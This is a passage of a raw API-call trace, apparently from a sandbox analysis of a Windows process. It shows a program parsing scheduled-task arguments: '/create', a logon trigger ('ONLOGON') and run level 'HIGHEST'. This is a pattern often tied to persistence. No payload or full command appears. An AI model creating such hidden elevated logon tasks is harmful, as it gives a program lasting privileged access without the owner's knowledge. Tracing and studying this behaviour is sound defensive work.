_BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.765] lstrlenW (lpString="|rp|") returned 4 [0067.765] lstrlenW (lpString="|sc|") returned 4 [0067.765] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0067.765] SetLastError (dwErrCode=0x490) [0067.765] lstrlenW (lpString="sc") returned 2 [0067.765] lstrlenW (lpString="sc") returned 2 [0067.765] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.765] lstrlenW (lpString="sc") returned 2 [0067.765] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.765] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.765] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.765] lstrlenW (lpString="|sc|") returned 4 [0067.765] lstrlenW (lpString="|sc|") returned 4 [0067.765] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0067.765] SetLastError (dwErrCode=0x0) [0067.765] SetLastError (dwErrCode=0x0) [0067.765] lstrlenW (lpString="ONLOGON") returned 7 [0067.765] lstrlenW (lpString="-/") returned 2 [0067.765] StrChrIW (lpStart="-/", wMatch=0x4f) returned 0x0 [0067.766] SetLastError (dwErrCode=0x490) [0067.766] SetLastError (dwErrCode=0x490) [0067.766] SetLastError (dwErrCode=0x0) [0067.766] lstrlenW (lpString="ONLOGON") returned 7 [0067.766] StrChrIW (lpStart="ONLOGON", wMatch=0x3a) returned 0x0 [0067.766] SetLastError (dwErrCode=0x490) [0067.766] SetLastError (dwErrCode=0x0) [0067.766] GetProcessHeap () returned 0x660000 [0067.766] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674cd8 [0067.766] _memicmp (_Buf1=0x674cd8, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.766] lstrlenW (lpString="ONLOGON") returned 7 [0067.766] GetProcessHeap () returned 0x660000 [0067.766] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674ca8 [0067.766] lstrlenW (lpString="ONLOGON") returned 7 [0067.766] lstrlenW (lpString=" \x09") returned 2 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0067.766] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0067.766] GetLastError () returned 0x0 [0067.766] lstrlenW (lpString="ONLOGON") returned 7 [0067.766] lstrlenW (lpString="ONLOGON") returned 7 [0067.766] SetLastError (dwErrCode=0x0) [0067.766] SetLastError (dwErrCode=0x0) [0067.766] lstrlenW (lpString="/RL") returned 3 [0067.766] lstrlenW (lpString="-/") returned 2 [0067.766] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.766] lstrlenW (lpString="create") returned 6 [0067.766] lstrlenW (lpString="create") returned 6 [0067.766] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.766] lstrlenW (lpString="RL") returned 2 [0067.766] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.766] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|create|") returned 8 [0067.766] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.766] lstrlenW (lpString="|create|") returned 8 [0067.766] lstrlenW (lpString="|RL|") returned 4 [0067.767] StrStrIW (lpFirst="|create|", lpSrch="|RL|") returned 0x0 [0067.767] SetLastError (dwErrCode=0x490) [0067.767] lstrlenW (lpString="?") returned 1 [0067.767] lstrlenW (lpString="?") returned 1 [0067.767] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.767] lstrlenW (lpString="RL") returned 2 [0067.767] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.767] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|?|") returned 3 [0067.767] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.767] lstrlenW (lpString="|?|") returned 3 [0067.767] lstrlenW (lpString="|RL|") returned 4 [0067.767] SetLastError (dwErrCode=0x490) [0067.767] lstrlenW (lpString="s") returned 1 [0067.767] lstrlenW (lpString="s") returned 1 [0067.767] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.767] lstrlenW (lpString="RL") returned 2 [0067.767] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.767] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|s|") returned 3 [0067.767] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.767] lstrlenW (lpString="|s|") returned 3 [0067.767] lstrlenW (lpString="|RL|") returned 4 [0067.767] SetLastError (dwErrCode=0x490) [0067.767] lstrlenW (lpString="u") returned 1 [0067.767] lstrlenW (lpString="u") returned 1 [0067.767] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.767] lstrlenW (lpString="RL") returned 2 [0067.767] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.767] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|u|") returned 3 [0067.767] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.767] lstrlenW (lpString="|u|") returned 3 [0067.767] lstrlenW (lpString="|RL|") returned 4 [0067.767] SetLastError (dwErrCode=0x490) [0067.767] lstrlenW (lpString="p") returned 1 [0067.767] lstrlenW (lpString="p") returned 1 [0067.767] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.767] lstrlenW (lpString="RL") returned 2 [0067.768] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.768] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|p|") returned 3 [0067.768] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.768] lstrlenW (lpString="|p|") returned 3 [0067.768] lstrlenW (lpString="|RL|") returned 4 [0067.768] SetLastError (dwErrCode=0x490) [0067.768] lstrlenW (lpString="ru") returned 2 [0067.768] lstrlenW (lpString="ru") returned 2 [0067.768] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.768] lstrlenW (lpString="RL") returned 2 [0067.768] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.768] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ru|") returned 4 [0067.768] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.768] lstrlenW (lpString="|ru|") returned 4 [0067.768] lstrlenW (lpString="|RL|") returned 4 [0067.768] StrStrIW (lpFirst="|ru|", lpSrch="|RL|") returned 0x0 [0067.768] SetLastError (dwErrCode=0x490) [0067.768] lstrlenW (lpString="rp") returned 2 [0067.768] lstrlenW (lpString="rp") returned 2 [0067.768] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.768] lstrlenW (lpString="RL") returned 2 [0067.768] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.768] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|rp|") returned 4 [0067.768] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.768] lstrlenW (lpString="|rp|") returned 4 [0067.768] lstrlenW (lpString="|RL|") returned 4 [0067.768] StrStrIW (lpFirst="|rp|", lpSrch="|RL|") returned 0x0 [0067.768] SetLastError (dwErrCode=0x490) [0067.768] lstrlenW (lpString="sc") returned 2 [0067.768] lstrlenW (lpString="sc") returned 2 [0067.768] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.768] lstrlenW (lpString="RL") returned 2 [0067.768] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.768] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.768] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.768] lstrlenW (lpString="|sc|") returned 4 [0067.769] lstrlenW (lpString="|RL|") returned 4 [0067.769] StrStrIW (lpFirst="|sc|", lpSrch="|RL|") returned 0x0 [0067.769] SetLastError (dwErrCode=0x490) [0067.769] lstrlenW (lpString="mo") returned 2 [0067.769] lstrlenW (lpString="mo") returned 2 [0067.769] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.769] lstrlenW (lpString="RL") returned 2 [0067.769] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.769] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|mo|") returned 4 [0067.769] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.769] lstrlenW (lpString="|mo|") returned 4 [0067.769] lstrlenW (lpString="|RL|") returned 4 [0067.769] StrStrIW (lpFirst="|mo|", lpSrch="|RL|") returned 0x0 [0067.769] SetLastError (dwErrCode=0x490) [0067.769] lstrlenW (lpString="d") returned 1 [0067.769] lstrlenW (lpString="d") returned 1 [0067.769] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.769] lstrlenW (lpString="RL") returned 2 [0067.769] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.769] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|d|") returned 3 [0067.769] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.769] lstrlenW (lpString="|d|") returned 3 [0067.769] lstrlenW (lpString="|RL|") returned 4 [0067.769] SetLastError (dwErrCode=0x490) [0067.769] lstrlenW (lpString="m") returned 1 [0067.769] lstrlenW (lpString="m") returned 1 [0067.769] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.769] lstrlenW (lpString="RL") returned 2 [0067.769] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.769] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|m|") returned 3 [0067.769] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.769] lstrlenW (lpString="|m|") returned 3 [0067.769] lstrlenW (lpString="|RL|") returned 4 [0067.769] SetLastError (dwErrCode=0x490) [0067.769] lstrlenW (lpString="i") returned 1 [0067.769] lstrlenW (lpString="i") returned 1 [0067.770] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] lstrlenW (lpString="RL") returned 2 [0067.770] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|i|") returned 3 [0067.770] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.770] lstrlenW (lpString="|i|") returned 3 [0067.770] lstrlenW (lpString="|RL|") returned 4 [0067.770] SetLastError (dwErrCode=0x490) [0067.770] lstrlenW (lpString="tn") returned 2 [0067.770] lstrlenW (lpString="tn") returned 2 [0067.770] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] lstrlenW (lpString="RL") returned 2 [0067.770] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.770] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.770] lstrlenW (lpString="|tn|") returned 4 [0067.770] lstrlenW (lpString="|RL|") returned 4 [0067.770] StrStrIW (lpFirst="|tn|", lpSrch="|RL|") returned 0x0 [0067.770] SetLastError (dwErrCode=0x490) [0067.770] lstrlenW (lpString="tr") returned 2 [0067.770] lstrlenW (lpString="tr") returned 2 [0067.770] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] lstrlenW (lpString="RL") returned 2 [0067.770] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.770] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.770] lstrlenW (lpString="|tr|") returned 4 [0067.770] lstrlenW (lpString="|RL|") returned 4 [0067.770] StrStrIW (lpFirst="|tr|", lpSrch="|RL|") returned 0x0 [0067.770] SetLastError (dwErrCode=0x490) [0067.770] lstrlenW (lpString="st") returned 2 [0067.770] lstrlenW (lpString="st") returned 2 [0067.770] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] lstrlenW (lpString="RL") returned 2 [0067.770] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.770] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|st|") returned 4 [0067.771] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.771] lstrlenW (lpString="|st|") returned 4 [0067.771] lstrlenW (lpString="|RL|") returned 4 [0067.771] StrStrIW (lpFirst="|st|", lpSrch="|RL|") returned 0x0 [0067.771] SetLastError (dwErrCode=0x490) [0067.771] lstrlenW (lpString="sd") returned 2 [0067.771] lstrlenW (lpString="sd") returned 2 [0067.771] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.771] lstrlenW (lpString="RL") returned 2 [0067.771] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.771] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sd|") returned 4 [0067.771] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.771] lstrlenW (lpString="|sd|") returned 4 [0067.771] lstrlenW (lpString="|RL|") returned 4 [0067.771] StrStrIW (lpFirst="|sd|", lpSrch="|RL|") returned 0x0 [0067.771] SetLastError (dwErrCode=0x490) [0067.771] lstrlenW (lpString="ed") returned 2 [0067.771] lstrlenW (lpString="ed") returned 2 [0067.771] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.771] lstrlenW (lpString="RL") returned 2 [0067.771] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.771] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ed|") returned 4 [0067.771] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.771] lstrlenW (lpString="|ed|") returned 4 [0067.771] lstrlenW (lpString="|RL|") returned 4 [0067.771] StrStrIW (lpFirst="|ed|", lpSrch="|RL|") returned 0x0 [0067.771] SetLastError (dwErrCode=0x490) [0067.771] lstrlenW (lpString="it") returned 2 [0067.771] lstrlenW (lpString="it") returned 2 [0067.771] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.771] lstrlenW (lpString="RL") returned 2 [0067.771] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.771] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|it|") returned 4 [0067.771] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.771] lstrlenW (lpString="|it|") returned 4 [0067.771] lstrlenW (lpString="|RL|") returned 4 [0067.772] StrStrIW (lpFirst="|it|", lpSrch="|RL|") returned 0x0 [0067.772] SetLastError (dwErrCode=0x490) [0067.772] lstrlenW (lpString="et") returned 2 [0067.772] lstrlenW (lpString="et") returned 2 [0067.772] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.772] lstrlenW (lpString="RL") returned 2 [0067.772] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.772] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|et|") returned 4 [0067.772] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.772] lstrlenW (lpString="|et|") returned 4 [0067.772] lstrlenW (lpString="|RL|") returned 4 [0067.772] StrStrIW (lpFirst="|et|", lpSrch="|RL|") returned 0x0 [0067.772] SetLastError (dwErrCode=0x490) [0067.772] lstrlenW (lpString="k") returned 1 [0067.772] lstrlenW (lpString="k") returned 1 [0067.772] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.772] lstrlenW (lpString="RL") returned 2 [0067.772] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.772] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|k|") returned 3 [0067.772] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.772] lstrlenW (lpString="|k|") returned 3 [0067.772] lstrlenW (lpString="|RL|") returned 4 [0067.772] SetLastError (dwErrCode=0x490) [0067.772] lstrlenW (lpString="du") returned 2 [0067.772] lstrlenW (lpString="du") returned 2 [0067.772] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.772] lstrlenW (lpString="RL") returned 2 [0067.772] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.772] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|du|") returned 4 [0067.772] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.772] lstrlenW (lpString="|du|") returned 4 [0067.772] lstrlenW (lpString="|RL|") returned 4 [0067.772] StrStrIW (lpFirst="|du|", lpSrch="|RL|") returned 0x0 [0067.772] SetLastError (dwErrCode=0x490) [0067.772] lstrlenW (lpString="ri") returned 2 [0067.772] lstrlenW (lpString="ri") returned 2 [0067.773] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] lstrlenW (lpString="RL") returned 2 [0067.773] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ri|") returned 4 [0067.773] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.773] lstrlenW (lpString="|ri|") returned 4 [0067.773] lstrlenW (lpString="|RL|") returned 4 [0067.773] StrStrIW (lpFirst="|ri|", lpSrch="|RL|") returned 0x0 [0067.773] SetLastError (dwErrCode=0x490) [0067.773] lstrlenW (lpString="z") returned 1 [0067.773] lstrlenW (lpString="z") returned 1 [0067.773] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] lstrlenW (lpString="RL") returned 2 [0067.773] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|z|") returned 3 [0067.773] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.773] lstrlenW (lpString="|z|") returned 3 [0067.773] lstrlenW (lpString="|RL|") returned 4 [0067.773] SetLastError (dwErrCode=0x490) [0067.773] lstrlenW (lpString="f") returned 1 [0067.773] lstrlenW (lpString="f") returned 1 [0067.773] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] lstrlenW (lpString="RL") returned 2 [0067.773] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.773] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.773] lstrlenW (lpString="|f|") returned 3 [0067.773] lstrlenW (lpString="|RL|") returned 4 [0067.773] SetLastError (dwErrCode=0x490) [0067.773] lstrlenW (lpString="v1") returned 2 [0067.773] lstrlenW (lpString="v1") returned 2 [0067.773] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] lstrlenW (lpString="RL") returned 2 [0067.773] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.773] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|v1|") returned 4 [0067.773] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.774] lstrlenW (lpString="|v1|") returned 4 [0067.774] lstrlenW (lpString="|RL|") returned 4 [0067.774] StrStrIW (lpFirst="|v1|", lpSrch="|RL|") returned 0x0 [0067.774] SetLastError (dwErrCode=0x490) [0067.774] lstrlenW (lpString="xml") returned 3 [0067.774] lstrlenW (lpString="xml") returned 3 [0067.774] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.774] lstrlenW (lpString="RL") returned 2 [0067.774] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.774] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|xml|") returned 5 [0067.774] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.774] lstrlenW (lpString="|xml|") returned 5 [0067.774] lstrlenW (lpString="|RL|") returned 4 [0067.774] StrStrIW (lpFirst="|xml|", lpSrch="|RL|") returned 0x0 [0067.774] SetLastError (dwErrCode=0x490) [0067.774] lstrlenW (lpString="ec") returned 2 [0067.774] lstrlenW (lpString="ec") returned 2 [0067.774] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.774] lstrlenW (lpString="RL") returned 2 [0067.774] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.774] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ec|") returned 4 [0067.774] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.774] lstrlenW (lpString="|ec|") returned 4 [0067.774] lstrlenW (lpString="|RL|") returned 4 [0067.774] StrStrIW (lpFirst="|ec|", lpSrch="|RL|") returned 0x0 [0067.774] SetLastError (dwErrCode=0x490) [0067.774] lstrlenW (lpString="rl") returned 2 [0067.774] lstrlenW (lpString="rl") returned 2 [0067.774] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.774] lstrlenW (lpString="RL") returned 2 [0067.774] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.774] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|rl|") returned 4 [0067.774] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|RL|") returned 4 [0067.774] lstrlenW (lpString="|rl|") returned 4 [0067.774] lstrlenW (lpString="|RL|") returned 4 [0067.774] StrStrIW (lpFirst="|rl|", lpSrch="|RL|") returned="|rl|" [0067.775] SetLastError (dwErrCode=0x0) [0067.775] SetLastError (dwErrCode=0x0) [0067.775] lstrlenW (lpString="HIGHEST") returned 7 [0067.775] lstrlenW (lpString="-/") returned 2 [0067.775] StrChrIW (lpStart="-/", wMatch=0x48) returned 0x0 [0067.775] SetLastError (dwErrCode=0x490) [0067.775] SetLastError (dwErrCode=0x490) [0067.775] SetLastError (dwErrCode=0x0) [0067.775] lstrlenW (lpString="HIGHEST") returned 7 [0067.775] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0067.775] SetLastError (dwErrCode=0x490) [0067.775] SetLastError (dwErrCode=0x0) [0067.775] _memicmp (_Buf1=0x674cd8, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.775] lstrlenW (lpString="HIGHEST") returned 7 [0067.775] lstrlenW (lpString="HIGHEST") returned 7 [0067.775] lstrlenW (lpString=" \x09") returned 2 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0067.775] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0067.775] GetLastError () returned 0x0 [0067.775] lstrlenW (lpString="HIGHEST") returned 7 [0067.775] lstrlenW (lpString="HIGHEST") returned 7 [0067.775] SetLastError (dwErrCode=0x0) [0067.775] SetLastError (dwErrCode=0x0) [0067.775] lstrlenW (lpString="/tn") returned 3 [0067.775] lstrlenW (lpString="-/") returned 2 [0067.775] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.775] lstrlenW (lpString="create") returned 6 [0067.775] lstrlenW (lpString="create") returned 6 [0067.775] 